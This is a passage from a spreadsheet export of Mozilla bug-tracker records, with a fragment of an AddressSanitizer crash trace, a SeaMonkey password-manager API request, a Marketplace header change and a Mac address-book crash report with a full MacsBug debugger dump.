    #25 0x7feca0a90577 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, ELMCreationDetector&amp;, nsCxPusher*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/events/src/nsEventDispatcher.cpp:221:0
previously allocated by thread T0 here:
    #0 0x445fa5 in malloc _asan_rtl_:0
    #1 0x7fecaa10edca in PL_ArenaAllocate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/nsprpub/lib/ds/plarena.c:200:0
Shadow bytes around the buggy address:
  0x0c4a8021a100: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c4a8021a150: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a8021a1a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45947==ABORTING</t>
        </is>
      </c>
      <c r="X4112" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4113">
      <c r="A4113" t="n">
        <v>84834</v>
      </c>
      <c r="B4113" t="inlineStr">
        <is>
          <t>2001-06-08 17:34:24 -0700</t>
        </is>
      </c>
      <c r="C4113" t="inlineStr">
        <is>
          <t>We need an API that returns the password given the host and/or user name</t>
        </is>
      </c>
      <c r="D4113" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4113" t="n">
        <v>1</v>
      </c>
      <c r="F4113" t="n">
        <v>1</v>
      </c>
      <c r="G4113" t="n">
        <v>2</v>
      </c>
      <c r="H4113" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4113" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4113" t="inlineStr">
        <is>
          <t>Passwords &amp; Permissions</t>
        </is>
      </c>
      <c r="K4113" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4113" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4113" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4113" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4113" t="inlineStr">
        <is>
          <t>[pdt+]</t>
        </is>
      </c>
      <c r="Q4113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4113" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4113" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T4113" t="n">
        <v>1</v>
      </c>
      <c r="U4113" t="n">
        <v>0</v>
      </c>
      <c r="V4113" t="n">
        <v>32</v>
      </c>
      <c r="W4113" t="inlineStr">
        <is>
          <t>Today, a password stored in the password manager is obtained when when we go
through routines like PromptPassword ( &amp; GetPasswordwithUI()), which involve UI
elements to be passed in as input params. This arrangement is not convenient for
some other tasks where password is needed (if exists) without having to go
through UI tied up routines.
For example, in mailnews, we have a feature (bug 80296) where one can get
messages for multiple accounts by clicking 'Get All New Messages' on GetMsg
button dropmarker menupopup. What we do there is to get the server list and
query each server for the password. If the password value exists (say stored in
the password mgr in one of the earlier sessions), then that account is
authenticated. So, we can safely (wihtout having to worrying about password
popup) call getmessages on that server and get messages. Today, we are getting
null values back for some of the servers who passwords are already stored. Hence
the feature doesn't work as expected. So, the routine GetPassword() in
nsMsgIncomingServer has to be smarter than it is right now in returning the
password and we need Password Mgr's help to do that.
All GetPassword() does today is to make a copy of m_password and return the
same.
http://lxr.mozilla.org/seamonkey/source/mailnews/base/util/nsMsgIncomingServer.cpp#661
Today sometimes, Though the password actually exists, the m_password is not set
yet. 
Reason : we haven't made a call to GetPasswordWithUI yet (which will set the
m_password) which then will go contact SignonService and gets the password. 
Is it legal to get the password without having to go thru GetPasswordWithUI..?
Yes. It should be. 
When I query a server (whose password is stored) for it's password and if I get
back a null/empty string..then that's an error condition. So, GetPassword(), if
m_password is empty, should call nsPasswordMgr's API (that I am requesting here)
and return the passwrod if it is there. That's why we need that API. I am sure
some one else will also need such a thing as we go forward.
Another instance in mailnews where we need this feature desparately is the Biff
feature. Today Biff on any second account will fail as
http://lxr.mozilla.org/seamonkey/source/mailnews/base/src/nsMsgBiffManager.cpp#316
simply returns a null password. It works for the first account because user
might have actually clicked on GetMsg button (or some other authentication)
which calls GetPasswordWithUI(). Sheela, if you have bug number for this, please
state it here.
We need an API in nsIPasswordManager that goes something like 
string getPassword(string hostname, wstring username) or
string getPassword(string hostname)
I spoke to Steve Morse about the current abilities of the password manager. He
already has an idea on what I am looking for. 
I talked to mScott about the current scenario and we both agree we may need such
an API. I also talked to Sheel about the existing error condition in Biff.
Adding Seth &amp; Scott Putterman to the cc list.
bhuvan</t>
        </is>
      </c>
      <c r="X4113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4114">
      <c r="A4114" t="n">
        <v>730976</v>
      </c>
      <c r="B4114" t="inlineStr">
        <is>
          <t>2012-02-27 13:48:46 -0800</t>
        </is>
      </c>
      <c r="C4114" t="inlineStr">
        <is>
          <t>Remove links in Marketplace Header</t>
        </is>
      </c>
      <c r="D4114" t="inlineStr">
        <is>
          <t>2012-03-02 13:50:40 -0800</t>
        </is>
      </c>
      <c r="E4114" t="n">
        <v>1</v>
      </c>
      <c r="F4114" t="n">
        <v>1</v>
      </c>
      <c r="G4114" t="n">
        <v>5</v>
      </c>
      <c r="H4114" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4114" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4114" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4114" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4114" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4114" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4114" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4114" t="inlineStr">
        <is>
          <t>u=user c=wiki s=2012.5 p=1</t>
        </is>
      </c>
      <c r="Q4114" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4114" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4114" t="inlineStr">
        <is>
          <t>2012-03-13</t>
        </is>
      </c>
      <c r="T4114" t="n">
        <v>1</v>
      </c>
      <c r="U4114" t="n">
        <v>0</v>
      </c>
      <c r="V4114" t="n">
        <v>3</v>
      </c>
      <c r="W4114" t="inlineStr">
        <is>
          <t>For the Mozilla Marketplace front-end (https://support.allizom.org/en-US/marketplace) we need to remove the links to "Desktop and Mobile".</t>
        </is>
      </c>
      <c r="X4114" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4115">
      <c r="A4115" t="n">
        <v>22493</v>
      </c>
      <c r="B4115" t="inlineStr">
        <is>
          <t>1999-12-22 17:02:14 -0800</t>
        </is>
      </c>
      <c r="C4115" t="inlineStr">
        <is>
          <t>[PP][REGRESSION][DOGFOOD]Crash when selecting card in address book list</t>
        </is>
      </c>
      <c r="D4115" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4115" t="n">
        <v>1</v>
      </c>
      <c r="F4115" t="n">
        <v>1</v>
      </c>
      <c r="G4115" t="n">
        <v>2</v>
      </c>
      <c r="H4115" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4115" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4115" t="inlineStr">
        <is>
          <t>MailNews: Address Book &amp; Contacts</t>
        </is>
      </c>
      <c r="K4115" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4115" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4115" t="inlineStr">
        <is>
          <t>Mac System 8.6</t>
        </is>
      </c>
      <c r="N4115" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4115" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4115" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q4115" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4115" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4115" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4115" t="n">
        <v>1</v>
      </c>
      <c r="U4115" t="n">
        <v>0</v>
      </c>
      <c r="V4115" t="n">
        <v>5</v>
      </c>
      <c r="W4115" t="inlineStr">
        <is>
          <t>Happens on Mac and Linux build 1999-12-22-08 M13
Steps to repro:
1)Launch Seamonkey. When Mozilla comes up select Tasks--&gt;Address Book.
2)When address book doalog opens, click on one of the cards which is in the
Address Book to select it.
Actual results: You will crash.
Macs Bugs log follows.
 MacsBug 6.6, Copyright Apple Computer, Inc. 1981-99
PowerPC illegal instruction at FFC10008 _MemoryDispatch+00198
  22-Dec-1999 3:14:28 PM (since boot = 4 hours)
  Current application is ÒNetscapeÓ
  Machine = #406 (NewWorldMac), System $0860, sysu = $01008000
  ROM version $077D, $44B5, $0001 (ROMBase $FFC00000)
  VM is off
  NIL^ = $FFC10000
  Stack space used = +116722918
 Address FFC10008 is in the ROM at _MemoryDispatch+00198
 PowerPC 740/750 Registers
                         CR0  CR1  CR2  CR3  CR4  CR5  CR6  CR7
  PC  = FFC10008     CR  0010 0010 0000 0000 0000 1000 0010 1000
  LR  = 05A0954C         &lt;&gt;=O XEVO
  CTR = FFC10000
  MSR = 00000000         SOC Compare Count
  Int = 0            XER 001   00     00                     MQ  = 00000000
  R0  = FFC10000     R8  = 00000000      R16 = 00006100      R24 = 04CD3D14
  SP  = 06B5CDE0     R9  = 00000000      R17 = 00000000      R25 = 05340D2C
  TOC = 0000508B     R10 = 00000000      R18 = 00000000      R26 = 04CEC880
  R3  = 00000000     R11 = 02A560C0      R19 = 04CCFD20      R27 = 05340D2C
  R4  = 05340D2C     R12 = 00000000      R20 = 00000001      R28 = 06B5D7B8
  R5  = 06B5D7B8     R13 = 06B5E1F0      R21 = 00000004      R29 = 06674160
  R6  = 06B5CE20     R14 = 05FA2330      R22 = 00000000      R30 = 00000000
  R7  = 0666BC84     R15 = 00000000      R23 = 00000000      R31 = 06508740
 Disassembling PowerPC code from FFC0FFE0
  _MemoryDispatch
     +00170 FFC0FFE0   dc.l       0xFFFC28CB                              |
FFFC28CB
     +00174 FFC0FFE4   cmplwi     cr1,r0,0x307C                           |
2880307C
     +00178 FFC0FFE8   dc.l       0x00014242                              |
00014242
     +0017C FFC0FFEC   subfic     r0,RTOC,0x225F                          |
2002225F
     +00180 FFC0FFF0   dc.l       0x4CDF1808                              |
4CDF1808
     +00184 FFC0FFF4   dc.l       0x4E7591C8                              |
4E7591C8
     +00188 FFC0FFF8   subic.     SP,r28,0x0032                           |
343CFFCE
     +0018C FFC0FFFC   ori        r14,r7,0x2857                           |
60EE2857
     +00190 FFC10000   subfic     RTOC,r20,0x508C                         |
2054508C
     +00194 FFC10004   subfic     r16,r3,0x6100                           |
22036100
     +00198 FFC10008  *dc.l       0x00184A42                              |
00184A42
     +0019C FFC1000C   xori       r8,r31,0x2041                           |
6BE82041
     +001A0 FFC10010   ori        r26,r6,0x0000                           |
60DA0000
     +001A4 FFC10014   dc.l       0x00000000                              |
00000000
     +001A8 FFC10018   dc.l       0x00000000                              |
00000000
     +001AC FFC1001C   dc.l       0x00000000                              |
00000000
     +001B0 FFC10020   dc.l       0x4E56FFE0                              |
4E56FFE0
     +001B4 FFC10024   b          CoerceObjToZone+00104      ; 0x00A81F24 |
48E71F00
     +001B8 FFC10028   cmpwi      cr2,SP,-0x0010                          |
2D41FFF0
     +001BC FFC1002C   cmpdi      cr2,r28,0x0000                          |
2D7C0000
 Heap zones
  #1  Mod       16212K  00002800 to 00FD784F  SysZone^
  #2  Mod           5K    00017720 to 00018ECF  ROM read-only zone
  #3  Mod         288K    00513160 to 0055B15F
  #4  Mod          94K    005BD230 to 005D4E0F
  #5  Mod      104415K  00FD7850 to 075CF81F  Process Manager zone
  #6  Mod       11832K    05F86A00 to 06B14CCF  ÒNetscapeÓ  ApplZone^  TheZone^
TargetZone
  #7  Mod        4631K    06B60DF0 to 06FE6A1F  ÒNetscape AOL Instant MessengerÓ
  #8  Mod         187K    0707BEE0 to 070AAC8F  ÒFile Sharing ExtensionÓ
  #9  Mod         946K    0736B720 to 0745830F  ÒFinderÓ
  #10 Mod         121K    0746CBA0 to 0748B0FF  ÒTime SynchronizerÓ
  #11 Mod         381K    07499990 to 074F8EDF  ÒFolder ActionsÓ
  #12 Mod          92K    07555750 to 0756CAAF  ÒControl Strip ExtensionÓ
Checking all heaps
 The System heap at 00002800 is ok
 The ROM read-only heap at 00017720 is ok
 The heap at 00513160 is ok
 The heap at 005BD230 is ok
 The Process Manager heap at 00FD7850 is ok
 The ÒNetscapeÓ heap at 05F86A00 is ok
 The ÒNetscape AOL Instant MessengerÓ heap at 06B60DF0 is ok
 The ÒFile Sharing ExtensionÓ heap at 0707BEE0 is ok
 The ÒFinderÓ heap at 0736B720 is ok
 The ÒTime SynchronizerÓ heap at 0746CBA0 is ok
 The ÒFolder ActionsÓ heap at 07499990 is ok
 The ÒControl Strip ExtensionÓ heap at 07555750 is ok
  System heap high free space + TempMem low free space = #62814352 (#59M)
 The target heap is the System heap at 00002800
 Totaling the System heap at 00002800
                                 Total Blocks    Total of Block Sizes
  Free                           003C      #60   00011030       #69680 (#68K)
  Nonrelocatable                 0CA0    #3232   00AA97DC    #11179996 (#10M)
  Relocatable                    090D    #2317   0051A800     #5351424 (#5226K)
    Locked                       016E     #366   00305130     #3166512 (#3092K)
    Purgeable and not locked     0108     #264   00165620     #1463840 (#1429K)
  Heap size                      15E9    #5609   00FD500C    #16601100 (#15M)
 The target heap is the Process Manager heap at 00FD7850
 Totaling the Process Manager heap at 00FD7850
                                 Total Blocks    Total of Block Sizes
  Free                           0020      #32   03B5B1E0    #62239200 (#59M)
  Nonrelocatable                 0003       #3   0000CDAC       #52652 (#51K)
  Relocatable                    0111     #273   02A90000    #44630016 (#42M)
    Locked                       00AA     #170   02A083C0    #44073920 (#42M)
    Purgeable and not locked     0009       #9   00078CF0      #494832 (#483K)
  Heap size                      0134     #308   065F7F8C   #106921868 (#101M)
 The target heap is the ÒNetscapeÓ heap at 05F86A00
 Totaling the ÒNetscapeÓ heap at 05F86A00
                                 Total Blocks    Total of Block Sizes
  Free                           007A     #122   00245060     #2379872 (#2324K)
  Nonrelocatable                 00EB     #235   00789ECC     #7904972 (#7719K)
  Relocatable                    0C2E    #3118   001BF360     #1831776 (#1788K)
    Locked                       0069     #105   00121CA0     #1186976 (#1159K)
    Purgeable and not locked     0000       #0   00000000           #0
  Heap size                      0D93    #3475   00B8E28C    #12116620 (#11M)
 Displaying File Control Blocks
  FRef Name                         VRef Type Fl ForkID   LogEOF
  0002 System                       FFFF zsys mW rsrc     006290AC
  0060 **** EXTENTS B-TREE          FFFF ¥¥¥¥ mw data     001FE000
  00BE **** CATALOG B-TREE          FFFF ¥¥¥¥ Mw data     003FC000
  011C **** VOLUME BITMAP           FFFF ¥¥¥¥ mw data     00023000
  017A System Resources             FFFF zsyr mw rsrc     000D8191
  09EC Open Tpt AppleTalk Library   FFFF libr mw rsrc     0007B3CB
  0A4A Open Transport Library       FFFF libr mw rsrc     0007CB47
  0AA8 Open Transport Library       FFFF libr mw rsrc     0007CB47
  0B06 Open Transport Library       FFFF libr mw rsrc     0007CB47
  0B64 Open Tpt AppleTalk Library   FFFF libr mw rsrc     0007B3CB
  0BC2 Open Tpt Internet Library    FFFF libr mw rsrc     00070CF5
  0C20 Serial (Built-in)            FFFF libr mw rsrc     0000F716
  0C7E Users &amp; Groups Data File     FFFF BTFL mW data     00012000
  0CDC QuickTimeª                   FFFF INIT mw data     0005A4B6
  0D3A Netscape                     FFFF APPL mW rsrc     00017E57
  0D98 Control Strip Extension      FFFF appe mW rsrc     0001060C
  0E54 Netscape AOL Instant MessenÉ FFFF APPL mW rsrc     000E4ECB
  0EB2 Folder Actions               FFFF appe mW rsrc     00001369
  0F10 Time Synchronizer            FFFF appe mW rsrc     00001E07
  0F6E Finder                       FFFF FNDR mw rsrc     0009BE8C
  0FCC File Sharing Library         FFFF shlb mw rsrc     00000C76
  102A Finder Preferences           FFFF pref mW rsrc     0000023A
  1088 Desktop DB                   FFFF BTFL mW data     00036000
  10E6 Desktop DF                   FFFF DTFL mW data     001599E2
  1200 Network Setup Extension      FFFF shlb mw rsrc     00006821
  125E Network Setup Extension      FFFF shlb mw rsrc     00006821
  131A File Sharing Extension       FFFF INIT mW rsrc     0002F61C
  13D6 Network Setup Extension      FFFF shlb mw rsrc     00006821
  1434 Network Setup Extension      FFFF shlb mw rsrc     00006821
  1492 File Sharing Library         FFFF shlb mw rsrc     00000C76
  14F0 AIM Prefs                    FFFF Pref mW rsrc     000012C7
  154E Users &amp; Groups Data File     FFFF BTFL mW data     00012000
  15AC AppleShare PDS               FFFF BTFL mW data     0005A000
  160A Component Registry           FFFF BINA mW data     0003F143
  1668 widget.shlb                  FFFF shlb mw rsrc     00000399
  16C6 history.dat                  FFFF BINA mW data     000003DF
  1724 abook.mab                    FFFF BINA mW data     00009C62
  1782 StdLog                       FFFF TEXT mW data     0000230A
  0DF6 AppleShare PDS               FFFE BTFL mW data     00044800
  1144 **** EXTENTS B-TREE          FFFE ¥¥¥¥ mw data     000EFC00
  11A2 **** CATALOG B-TREE          FFFE ¥¥¥¥ mw data     000EFC00
  12BC Desktop DB                   FFFE BTFL mW data     00044800
  1378 Desktop DF                   FFFE DTFL mW data     0012B772
  #160 FCBs, #65 in use (including #22 fonts not listed), #95 free
 Displaying Volume Control Blocks
  vRef VolName             Flg dRef Drv# FSID NumBlks  BlkSiz FilCnt DirCnt
BlsdDir  VCBPtr
  FFFF Hard Disk           dsh FFCB 0008 0000 00111582 001000 0013F6 000298
00000018 00015380
  FFFE OS9                 dsh FFCB 0009 0000 FF68     011200 0007E4 000110
0000002A 00CA5F90
  #2 VCBs
 Displaying Drive Queue
  Drive Volume               Flags dRef Driver Name           FSID   Size
QElem at
  0008  Hard Disk            leiS  FFCB .ASYC00               0000 0088AF43
002342F4
  0009  OS9                  leiS  FFCB .ASYC00               0000 0088AF43
00234334
  0004  &lt;none&gt;               lEiS  FFA0 .iomegaDriverATA_0.S É0000 00000000
009EF004
  #3 drives
 Displaying Driver Control Entries
  dRef dNum Driver                      Flg  Ver   qHead  Stor/Ver Dely  Drvr at
DCE at
  FFFA 0005 .AIn                        bPC   #9 00000000 00000000 0000 00826AB0
002333D0
  FFF9 0006 .AOut                       bPC   #9 00000000 00000000 0000 00826B70
00233420
  FFF8 0007 .BIn                        bPC   #9 00000000 00000000 0000 00826C30
00233560
  FFF7 0008 .BOut                       bPC   #9 00000000 00000000 0000 00826CF0
002338C0
  FFF6 0009 .MPP                        bPO  #60 00000000 00000001 0000 008F5FD0
008646B0
  FFF5 000A .ATP                        bPO  #58 00000000 00AA3F30 0000 008D1C90
008FCF00
  FFD7 0028 .XPP                        bPO  #58 00000000 008D8C00 0000 008D59B0
00AB47D0
  FFD6 0029 .AFPTranslator              bPO   #0 00000000 00A77620 003C 00B2BC80
007DFE40
  FFCF 0030 .EDisk                      bPC   #0 00000000 00000000 003C FFCD0EA0
000B4C20
  FFCE 0031 .LANDisk                    bPC   #1 00000000 00000000 0000 000BA438
000CC820
  FFCD 0032 .Display_Rage128            bPO   #0 00000000 01.01f01 0000 000CF8C8
000CF890
  FFCC 0033 .ATALoad                    bPO   #0 00000000 00230B30 0001 FFD9A3F0
001571C0
  FFCB 0034 .ASYC00                     bPO   #0 00000000 00234CFE 0000 002388AE
002335E0
  FFCA 0035 .DAVAudio                   bPO   #0 00000000 01.11f00 0000 0041E218
0041E1E0
  FFC9 0036 .AppleSoundInput            bPO  #33 00000000 01.21f00 0000 007D49D8
007D49A0
  FFC8 0037 .ASLM                       bPO   #2 00000000 00000000 0000 0081E8F0
00093400
  FFC7 0038 .SLM                        bPO   #2 00000000 00000000 0000 00857A00
00857B90
  FFC6 0039 .DSP                        bPO  #58 00000000 002A41E0 0000 0099CDD0
00D91C30
  FFC5 003A .ipp                        bPC   #0 00000000 00000000 0000 009BBD50
00DC9900
  FFC4 003B .Infra                      bPO  #20 00000000 008984C0 0000 009B8380
0081DCB0
  FFC3 003C .DVaudio                    bPO  #32 00000000 01.20f03 0000 007DC1F8
007DC1C0
  FFC2 003D .AppleCD                    bPO   #0 00000000 009EEFC6 0078 00A115FE
009EF040
  FFC1 003E .DVDRegMgr                  bHO   #0 00000000 00000000 0001 00D053C0
00926E20
  FFC0 003F .swmdrvr                    bHO   #0 00000000 00005334 001E 0060DAF0
00090180
  FFBF 0040 .HDI                        bPO   #0 00000000 00C9C650 001E 00CE2180
00C28AC0
  FFA2 005D .DisplayBezelMgr            bHO   #0 00000000 000042A8 0001 00CA91F0
00C8FE00
  FFA1 005E .PrinterShare               bHO   #0 00000000 000048A0 0000 00C8B850
00AB0B30
  FFA0 005F .iomegaDriverATA_0.S v6.0.2 bPO   #0 00000000 000048CC 0005 00D6EFB0
00C7EC80
  #96 Unit Table entries, #28 in use, #68 free
 Displaying resource information:
  &gt;   Map $05FE0878, flags $0000, file $1668 = widget.shlb
      Map $05F86B88, flags $0000, file $0D3A = Netscape
   +  Map $00005A2C, flags $801A, file $0003 = ¥ROM resources that override
System¥
    S Map $00005A30, flags $200D, file $0002 = System
      Map $00005888, flags $0014, file $017A = System Resources
      [Skipped $0016 maps belonging to font files]
 Calling chain using A6/R1 links
  Back chain  ISA  Caller
  00000000    PPC  05F8C7C4
  06B60B00    PPC  05F898EC  main+00194
  06B60A60    PPC  05F8933C  main1(int, char**)+005D0
  06B60970    PPC  070277FC  nsAppShellService::Run()+00018
  06B60930    PPC  05C6B4B0  nsAppShell::Run()+00038
  06B608B0    PPC  05C6BBC8  nsMacMessagePump::DoMessagePump()+0003C
  06B60860    PPC  05C6BD84  nsMacMessagePump::DispatchEvent(int,
EventRecord*)+0005C
  06B60810    PPC  05C6C068  nsMacMessagePump::DoMouseDown(EventRecord&amp;)+000AC
  06B60740    PPC  05C6CB0C
nsMacMessagePump::DispatchOSEventToRaptor(EventRecord&amp;, GrafPort
*)+00044
  06B606F0    PPC  05C66D64  nsMacMessageSink::DispatchOSEvent(EventRecord&amp;,
GrafPort*)+00038
  06B606B0    PPC  05C60BF4  nsMacWindow::HandleOSEvent(EventRecord&amp;)+00020
  06B60650    PPC  05C616D8
nsMacEventHandler::HandleOSEvent(EventRecord&amp;)+000B0
  06B60600    PPC  05C62B50
nsMacEventHandler::HandleMouseDownEvent(EventRecord&amp;)+00298
  06B60510    PPC  05C4CB64  nsWindow::DispatchMouseEvent(nsMouseEvent&amp;)+00058
  06B604B0    PPC  05C4CA1C  nsWindow::DispatchWindowEvent(nsGUIEvent&amp;)+00018
  06B60470    PPC  05C4C948  nsWindow::DispatchEvent(nsGUIEvent*,
nsEventStatus&amp;)+00090
  06B60420    PPC  055CBF34  HandleEvent(nsGUIEvent*)+00058
  06B603D0    PPC  055C8B1C  nsViewManager::DispatchEvent(nsGUIEvent*,
nsEventStatus*)+0056C
  06B60230    PPC  055CDA48  nsView::HandleEvent(nsGUIEvent*, unsigned int,
nsEventStatus*, i
nt&amp;)+001E0
  06B601B0    PPC  0572E314  PresShell::HandleEvent(nsIView*, nsGUIEvent*,
nsEventStatus*)+00
2A0
  06B60130    PPC  0597A014  nsTreeCellFrame::HandleEvent(nsIPresContext*,
nsGUIEvent*, nsEve
ntStatus*)+00060
  06B600F0    PPC  0597A1EC
nsTreeCellFrame::HandleMouseDownEvent(nsIPresContext*, nsGUIEven
t*, nsEventStatus*)+00120
  06B60080    PPC  0596689C  nsTreeFrame::SetSelection(nsIPresContext*,
nsTreeCellFrame*)+002
38
  06B5FF10    PPC  05BC6288
nsXULTreeElement::SelectCell(nsIDOMXULElement*)+00124
  06B5FE70    PPC  05BC72AC  nsXULTreeElement::FireOnSelectHandler()+0020C
  06B5FCD0    PPC  05BDE534  nsXULElement::HandleDOMEvent(nsIPresContext*,
nsEvent*, nsIDOMEv
ent**, unsigned int, nsEventStatus*)+00354
  06B5FB70    PPC  057C5808
nsEventListenerManager::HandleEvent(nsIPresContext*, nsEvent*, n
sIDOMEvent**, unsigned int, nsEventStatus*)+00D9C
  06B5FA20    PPC  057C4950
nsEventListenerManager::HandleEventSubType(nsListenerStruct*, ns
IDOMEvent*, unsigned int)+00360
  06B5F7A0    PPC  05D83000  nsJSEventListener::HandleEvent(nsIDOMEvent*)+001D0
  06B5F680    PPC  05D17C18  nsJSContext::CallEventHandler(void*, void*,
unsigned int, void*,
 int*)+001E8
  06B5F5C0    PPC  05EB5E3C  JS_CallFunctionValue+00014
  06B5F580    PPC  05ECE254  js_InternalCall+000B8
  06B5F4D0    PPC  05ECE02C  js_Invoke+00554
  06B5F3F0    PPC  05ED4250  js_Interpret+05978
  06B5F1C0    PPC  05ECE02C  js_Invoke+00554
  06B5F0E0    PPC  05ED4250  js_Interpret+05978
  06B5EEB0    PPC  05ECE02C  js_Invoke+00554
  06B5EDD0    PPC  05ED4250  js_Interpret+05978
  06B5EBA0    PPC  05ECE02C  js_Invoke+00554
  06B5EAC0    PPC  05ED4250  js_Interpret+05978
  06B5E890    PPC  05ECE02C  js_Invoke+00554
  06B5E7B0    PPC  05ED4250  js_Interpret+05978
  06B5E580    PPC  05ECE02C  js_Invoke+00554
  06B5E4A0    PPC  05ED4250  js_Interpret+05978
  06B5E270    PPC  05ECDFD4  js_Invoke+004FC
  06B5E190    PPC  05D148F8  ElementRemoveAttribute(JSContext*, JSObject*,
unsigned int, long
*, long*)+001F4
  06B5E070    PPC  0580C6E0  nsHTMLDivElement::RemoveAttribute(const
nsString&amp;)+00010
  06B5E030    PPC  05924618  nsGenericElement::RemoveAttribute(const
nsString&amp;)+0005C
  06B5DFE0    PPC  0580D658  nsHTMLDivElement::UnsetAttribute(int, nsIAtom*,
int)+00010
  06B5DFA0    PPC  057DCEE0  nsGenericHTMLElement::UnsetAttribute(int, nsIAtom*,
int)+0015C
  06B5DF30    PPC  05B89718  nsXULDocument::AttributeChanged(nsIContent*, int,
nsIAtom*, int)
+000F8
  06B5DCE0    PPC  0572D030  PresShell::AttributeChanged(nsIDocument*,
nsIContent*, int, nsIA
tom*, int)+00078
  06B5DC80    PPC  05728CF8  PresShell::ExitReflowLock(int, int)+0003C
  06B5DC40    PPC  0572BADC  PresShell::ProcessReflowCommands()+000EC
  06B5DBB0    PPC  057BB420  nsHTMLReflowCommand::Dispatch(nsIPresContext*,
nsHTMLReflowMetri
cs&amp;, const nsSize&amp;, nsIRenderingContext&amp;)+000E4
  06B5DAB0    PPC  05979034  ViewportFrame::Reflow(nsIPresContext*,
nsHTMLReflowMetrics&amp;, con
st nsHTMLReflowState&amp;, unsigned int&amp;)+001E8
  06B5D930    PPC  05711190  nsContainerFrame::ReflowChild(nsIFrame*,
nsIPresContext*, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, int, int, unsigned int, unsigned
int&amp;)+000C8
  06B5D8C0    PPC  057D00E4  RootFrame::Reflow(nsIPresContext*,
nsHTMLReflowMetrics&amp;, const n
sHTMLReflowState&amp;, unsigned int&amp;)+001A4
  06B5D720    PPC  05711190  nsContainerFrame::ReflowChild(nsIFrame*,
nsIPresContext*, nsHTML
ReflowMetrics&amp;, const nsHTMLReflowState&amp;, int, int, unsigned int, unsigned
int&amp;)+000C8
  06B5D6B0    PPC  059A03E0  nsBoxFrame::Reflow(nsIPresContext*,
nsHTMLReflowMetrics&amp;, const
nsHTMLReflowState&amp;, unsigned int&amp;)+0012C
  06B5D5A0    PPC  059A27CC  nsBoxFrame::GetBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;
, nsBoxInfo&amp;)+000B4
  06B5D4E0    PPC  0599FF84  nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowS
tate&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
  06B5D3E0    PPC  059A27CC  nsBoxFrame::GetBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;
, nsBoxInfo&amp;)+000B4
  06B5D320    PPC  0599FF84  nsBoxFrame::GetChildBoxInfo(nsIPresContext*, const
nsHTMLReflowS
tate&amp;, nsIFrame*, nsCalculatedBoxInfo&amp;)+0007C
  06B5D220    PPC  059A27CC  nsBoxFrame::GetBoxInfo(nsIPresContext*, const
nsHTMLReflowState&amp;
, nsBoxInfo&amp;)+000B4
